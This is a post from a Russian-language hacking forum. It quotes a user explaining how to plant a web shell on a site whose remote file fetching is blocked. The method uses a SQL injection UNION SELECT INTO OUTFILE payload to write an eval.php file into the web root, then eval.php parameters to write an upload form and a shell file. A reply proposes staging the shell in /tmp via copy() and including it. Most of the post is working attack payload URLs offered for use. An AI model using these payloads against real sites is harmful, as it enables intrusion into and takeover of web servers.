06.10.2011, 20:44
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от beerhack
Помню на одном сайте нельзя было загружать файлы с других сайтов, то есть функцией copy() и подобными нельзя было залить шелл.
Чудил вот такое:
Код:
http://site.com/script.php?id=-1'+union+select+1,2,'',4,5,6,7,8,9,0,11+INTO+OUTFILE+'/var/www/html/eval.php'/*
Код:
http://site.com/eval.php?c=$ff = fopen("down.html","wt"); fwrite($ff,"shell's text"); fclose($ff);
Код:
http://site.com/eval.php?c=$ff = fopen("dshell.php","wt"); fwrite($ff,''); fclose($ff);
Открываем http://site.com/down.html вводим код шелла, нажимаем отправить.
Открываем http://site.com/sheleng.php там и будет наш шелл.
Мог бы просто написать, что отправляем POST запросом код шелла и сохраняем его в файл, но написал с банальными подробностями, думаю вопросы у некоторых отпадут. а что тебе мешает залить в /tmp через copy() и просто инклудить оттуда?
|
|
|